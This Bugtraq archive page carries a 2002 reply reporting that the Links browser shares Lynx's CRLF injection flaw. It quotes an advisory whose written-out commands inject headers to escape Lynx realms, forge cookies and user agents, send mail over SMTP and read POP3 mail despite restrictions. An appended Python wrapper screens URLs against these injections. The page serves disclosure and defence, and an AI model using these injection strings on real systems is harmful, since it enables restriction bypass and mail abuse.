Bugtraq mailing list archives
Re: Lynx CRLF Injection, part two
From: Alberto Devesa <alberto.devesa () m-centric com>
Date: Fri, 23 Aug 2002 11:09:21 +0200
The same bug seems to affect the links browser. I have tested it with the 0.96 version. Links is another console browser with extended capabilities not supported by lynx like frames, colors and menus.

On Thursday 22 August 2002 19:32, Ulf Harnhammar wrote:

> Lynx CRLF Injection, part two
>
> This is a follow-up to my "Lynx CRLF Injection" post a few days ago.
>
> * Lynx has got a realm feature that restricts users from accessing any host apart from the host of its start page. That is, if you start Lynx with "lynx -realm http://www.site1.st/", you are not allowed to go to http://www.site2.st/ . The CRLF Injection security hole allows users to break out of realms - the command:
>
> $ lynx -realm "http://www.site1.st/ HTTP/1.0
> Host: www.site2.st
>
> "
>
> will show site2.st, despite the fact that it is outside of the realm.
>
> * It allows users to send arbitrary cookies, user agents and referers to a web server - even if you're using a restrictions option saying that you're not allowed to change user agent:
>
> $ lynx -restrictions=useragent "http://www.site1.st/ HTTP/1.0
> User-Agent: Ulf 0.0
> Referer: http://www.metaur.nu/
> Cookie: user=ulf
>
> "
>
> * It is also possible to use this hole for communication with other types of servers than HTTP servers. You can send e-mails with it, for example - even if you're using a restrictions option saying that you're not allowed to send e-mails:
>
> $ lynx -restrictions=mail "http://mail.site1.st:587/ HTTP/1.0
> HELO my.own.site
> MAIL FROM: <my.own@mail.address>
> RCPT TO: <info () site1 st>
> DATA
> From: my.own@mail.address
> To: info () site1 st
> Subject: This is..
>
> This is a URL that sends an e-mail (?).
> .
> QUIT
> "
>
> You have to use port 587, as Lynx blocks port 25. The MTA will complain about the "GET / HTTP/1.0" string, but it still works.
>
> * You can even use this hole for reading e-mails from a POP3 server:
>
> $ lynx "http://mail.site1.st:110/ HTTP/1.0
> USER ulf
> PASS xxxx
> LIST
> RETR 1
> QUIT
> "
>
> The POP3 server will also complain about the "GET / HTTP/1.0" string, but it still works with this technology as well.
>
> * As previously noted, the holes listed above mostly affect programs that start Lynx, interactively or not, with a URL wholly or partially under the user's control.
>
> * The patch for this hole has moved to:
> ftp://lynx.isc.org/lynx/lynx2.8.4/patches/lynx2.8.4rel.1c.patch
>
> // Ulf Harnhammar
> ulfh () update uu se
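The last bullet of the quoted post is the practical exposure: a CGI script, kiosk or mail client that hands a user-supplied URL to lynx or links on the command line. Until the browser itself is patched, the program doing the launching has to refuse URLs that can carry a second request line or extra headers. The wrapper below is an added example written for this archive page; it is not code from Ulf Harnhammar's post, from Alberto Devesa, or from the Lynx or Links projects. The realm host, the port allowlist and the function names are assumptions made for the example.

```python
import re
import subprocess
from urllib.parse import urlsplit, unquote

# Assumed policy for this example: the realm host the wrapper is meant
# to stay on, and the only ports a web URL may name. Both are constructed.
ALLOWED_REALM_HOST = "www.site1.st"
ALLOWED_PORTS = {80, 443}

# CR, LF, NUL, other C0 controls, DEL and plain space. A browser that copies
# the URL verbatim into "GET <url> HTTP/1.0" treats a space as the end of
# the request target and a CRLF as the end of the request line, which is
# exactly what lets "Host:", "User-Agent:" or SMTP/POP3 commands follow.
_FORBIDDEN_RAW = re.compile(r"[\x00-\x20\x7f]")
# After percent-decoding only the line-structure characters are rejected,
# so a legitimately encoded space (%20) in a path is still allowed.
_FORBIDDEN_DECODED = re.compile(r"[\r\n\x00]")


def check_url(url: str, realm_host: str = ALLOWED_REALM_HOST) -> tuple[bool, str]:
    """Return (ok, reason). Rejects URLs that could inject request lines or
    headers, use a non-web scheme or port, or leave the realm host."""
    if _FORBIDDEN_RAW.search(url):
        return False, "control or whitespace character in URL"
    if _FORBIDDEN_DECODED.search(unquote(url)):
        return False, "percent-encoded CR/LF/NUL in URL"
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"unsupported scheme {parts.scheme!r}"
    if not parts.hostname:
        return False, "missing host"
    if parts.hostname.lower() != realm_host.lower():
        return False, f"host {parts.hostname!r} outside realm {realm_host!r}"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    return True, "ok"


def browser_command(url: str, realm_host: str = ALLOWED_REALM_HOST) -> list[str]:
    """Build the argv list for the browser, or raise if the URL is rejected.
    Passing argv as a list (no shell) keeps the URL one argument even if it
    contains quotes, so the only remaining channel is the URL text itself,
    which check_url has already screened."""
    ok, reason = check_url(url, realm_host)
    if not ok:
        raise ValueError(f"refusing to launch browser: {reason}")
    return ["lynx", "-realm", url]


def run_browser(url: str) -> int:
    """Launch the browser on a screened URL and return its exit status."""
    return subprocess.run(browser_command(url), check=False).returncode
```

Each of the four commands in the quoted post fails `check_url` on the first test (the embedded space and CRLF), and the SMTP and POP3 variants would also fail on the port even if the control characters were stripped, so a realm-escape, a forged header block or a mail-server conversation never reaches the command line.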